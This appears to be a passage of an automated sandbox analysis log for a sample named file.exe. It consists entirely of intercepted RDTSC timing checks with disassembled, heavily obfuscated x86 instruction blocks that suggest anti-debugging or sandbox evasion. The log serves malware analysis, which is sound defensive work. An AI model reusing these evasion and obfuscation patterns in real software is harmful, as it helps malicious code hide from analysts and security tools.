Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10E67 second address: 4A10F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F625CED05C2h 0x00000008 mov cx, 7CA1h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F625CED05BCh 0x00000015 push eax 0x00000016 jmp 00007F625CED05BBh 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d pushad 0x0000001e call 00007F625CED05C2h 0x00000023 pop eax 0x00000024 mov ah, dh 0x00000026 popad 0x00000027 pushfd 0x00000028 jmp 00007F625CED05BCh 0x0000002d jmp 00007F625CED05C5h 0x00000032 popfd 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 jmp 00007F625CED05BEh 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F625CED05C7h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60008 second address: 4A6000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A6000C second address: 4A60010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60010 second address: 4A60016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A60016 second address: 4A600C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F625CED05C4h 0x00000008 mov ah, C5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f mov cx, E51Fh 0x00000013 pushfd 0x00000014 jmp 00007F625CED05C4h 0x00000019 sub ax, D688h 0x0000001e jmp 00007F625CED05BBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esp], ebp 0x00000028 jmp 00007F625CED05C6h 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 call 00007F625CED05BEh 0x00000035 pushfd 0x00000036 jmp 00007F625CED05C2h 0x0000003b and si, 4B48h 0x00000040 jmp 00007F625CED05BBh 0x00000045 popfd 0x00000046 pop esi 0x00000047 mov bx, AD8Ch 0x0000004b popad 0x0000004c pop ebp 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F625CED05BEh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F00DE second address: 49F0107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2475h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F625CDF246Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0107 second address: 49F0123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0123 second address: 49F0127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0127 second address: 49F012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F012D second address: 49F0174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2475h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F625CDF2473h 0x00000013 jmp 00007F625CDF2473h 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0174 second address: 49F0179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F026B second address: 49F0271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10C14 second address: 4A10C44 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F625CED05BFh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F625CED05C5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10C44 second address: 4A10C4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10C4A second address: 4A10C7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F625CED05BFh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F625CED05C5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107A6 second address: 4A107AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107AC second address: 4A107B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107B1 second address: 4A107DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F625CDF246Ah 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e jmp 00007F625CDF246Eh 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107DB second address: 4A107DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107DF second address: 4A107FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A107FC second address: 4A10812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov cx, DEADh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A1066E second address: 4A106F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2473h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F625CDF246Fh 0x00000010 mov bx, si 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F625CDF2477h 0x0000001e sub ah, 0000007Eh 0x00000021 jmp 00007F625CDF2479h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F625CDF2470h 0x0000002d add ecx, 50D70178h 0x00000033 jmp 00007F625CDF246Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A106F7 second address: 4A106FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A106FD second address: 4A10701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10701 second address: 4A10736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov bl, F4h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F625CED05C4h 0x00000015 xor ax, AB08h 0x0000001a jmp 00007F625CED05BBh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10736 second address: 4A10776 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F625CDF2478h 0x00000008 adc ch, 00000068h 0x0000000b jmp 00007F625CDF246Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F625CDF246Bh 0x0000001d mov di, ax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A201B4 second address: 4A201C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30497 second address: 4A304A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A304A6 second address: 4A3050D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F625CED05BEh 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F625CED05C7h 0x00000019 sbb ax, 80AEh 0x0000001e jmp 00007F625CED05C9h 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3050D second address: 4A30539 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F625CDF2470h 0x00000008 sub eax, 4DB56A28h 0x0000000e jmp 00007F625CDF246Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 movzx esi, bx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30539 second address: 4A3057A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F625CED05BDh 0x0000000d mov ebp, esp 0x0000000f jmp 00007F625CED05BEh 0x00000014 mov eax, dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F625CED05C7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3057A second address: 4A30580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30580 second address: 4A30584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30584 second address: 4A3059B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F625CDF246Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3059B second address: 4A305AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F625CED05BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A305AD second address: 4A305CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c pushad 0x0000000d jmp 00007F625CDF246Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A105BF second address: 4A105C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A105C5 second address: 4A105C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30015 second address: 4A30084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F625CED05BEh 0x0000000f push eax 0x00000010 jmp 00007F625CED05BBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F625CED05C4h 0x0000001d sbb cl, FFFFFF88h 0x00000020 jmp 00007F625CED05BBh 0x00000025 popfd 0x00000026 mov dx, ax 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F625CED05C1h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30084 second address: 4A300A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F625CDF246Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A300A9 second address: 4A300B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30262 second address: 4A302BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F625CDF246Bh 0x00000009 and eax, 040E45FEh 0x0000000f jmp 00007F625CDF2479h 0x00000014 popfd 0x00000015 call 00007F625CDF2470h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f pushad 0x00000020 push eax 0x00000021 mov esi, edi 0x00000023 pop edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F625CDF2472h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A302BF second address: 4A30311 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F625CED05C9h 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F625CED05C1h 0x00000019 add ecx, 32A99DA6h 0x0000001f jmp 00007F625CED05C1h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5078D second address: 4A5081D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 0FA82A93h 0x00000010 mov si, DCEFh 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 mov ch, dl 0x00000019 pushfd 0x0000001a jmp 00007F625CDF246Ch 0x0000001f add ch, 00000018h 0x00000022 jmp 00007F625CDF246Bh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a pushad 0x0000002b push eax 0x0000002c pushfd 0x0000002d jmp 00007F625CDF246Bh 0x00000032 sub ax, 43DEh 0x00000037 jmp 00007F625CDF2479h 0x0000003c popfd 0x0000003d pop ecx 0x0000003e mov dx, 4754h 0x00000042 popad 0x00000043 mov ebp, esp 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F625CDF2476h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5081D second address: 4A50839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 221FFFB4h 0x00000008 movsx edx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F625CED05BBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50839 second address: 4A5085C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F625CDF246Fh 0x00000008 mov si, E75Fh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 mov dx, si 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5085C second address: 4A5087C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 81BAh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F625CED05C3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5087C second address: 4A508C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 323E651Ah 0x00000008 pushfd 0x00000009 jmp 00007F625CDF246Bh 0x0000000e or si, FEBEh 0x00000013 jmp 00007F625CDF2479h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [76FB65FCh] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F625CDF246Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A508C6 second address: 4A508D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F625CED05BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A508D6 second address: 4A5092F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f pushfd 0x00000010 jmp 00007F625CDF246Bh 0x00000015 sbb ch, 0000002Eh 0x00000018 jmp 00007F625CDF2479h 0x0000001d popfd 0x0000001e pop eax 0x0000001f mov dh, 90h 0x00000021 popad 0x00000022 je 00007F62CF2D54B4h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F625CDF246Fh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5092F second address: 4A50935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50935 second address: 4A50939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50939 second address: 4A509BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a jmp 00007F625CED05C7h 0x0000000f xor eax, dword ptr [ebp+08h] 0x00000012 jmp 00007F625CED05BFh 0x00000017 and ecx, 1Fh 0x0000001a jmp 00007F625CED05C6h 0x0000001f ror eax, cl 0x00000021 jmp 00007F625CED05C0h 0x00000026 leave 0x00000027 jmp 00007F625CED05C0h 0x0000002c retn 0004h 0x0000002f nop 0x00000030 mov esi, eax 0x00000032 lea eax, dword ptr [ebp-08h] 0x00000035 xor esi, dword ptr [00102014h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push eax 0x0000003e lea eax, dword ptr [ebp-10h] 0x00000041 push eax 0x00000042 call 00007F6261860EA1h 0x00000047 push FFFFFFFEh 0x00000049 pushad 0x0000004a mov dl, al 0x0000004c mov eax, edx 0x0000004e popad 0x0000004f pop eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A509BA second address: 4A509BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A509BE second address: 4A509CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A509CC second address: 4A509E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F6261782D7Bh 0x00000011 mov edi, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A509E4 second address: 4A509E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A509E8 second address: 4A509EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A509EC second address: 4A509F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A509F2 second address: 4A50A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F625CDF2479h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50A0F second address: 4A50A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50A13 second address: 4A50A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov ax, FDDFh 0x0000000e push eax 0x0000000f push edx 0x00000010 movzx esi, dx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50A26 second address: 4A50A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F625CED05C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50A48 second address: 4A50A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F625CDF2474h 0x00000012 xor ax, 51D8h 0x00000017 jmp 00007F625CDF246Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50A85 second address: 4A50AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F625CED05BDh 0x00000010 add cl, 00000076h 0x00000013 jmp 00007F625CED05C1h 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50AB4 second address: 4A50AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00010 second address: 4A00014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00014 second address: 4A0001A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0001A second address: 4A00020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00020 second address: 4A00024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00024 second address: 4A00028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00028 second address: 4A000AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F625CDF2476h 0x00000013 sbb ecx, 383E21F8h 0x00000019 jmp 00007F625CDF246Bh 0x0000001e popfd 0x0000001f popad 0x00000020 movzx eax, bx 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 mov cx, dx 0x0000002a pushfd 0x0000002b jmp 00007F625CDF246Dh 0x00000030 and ch, FFFFFF96h 0x00000033 jmp 00007F625CDF2471h 0x00000038 popfd 0x00000039 popad 0x0000003a and esp, FFFFFFF8h 0x0000003d pushad 0x0000003e mov esi, 506054A3h 0x00000043 mov edi, ecx 0x00000045 popad 0x00000046 xchg eax, ecx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F625CDF2471h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A000AD second address: 4A0011D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F625CED05C1h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F625CED05C3h 0x00000019 and ax, 4A8Eh 0x0000001e jmp 00007F625CED05C9h 0x00000023 popfd 0x00000024 call 00007F625CED05C0h 0x00000029 pop esi 0x0000002a popad 0x0000002b rdtsc
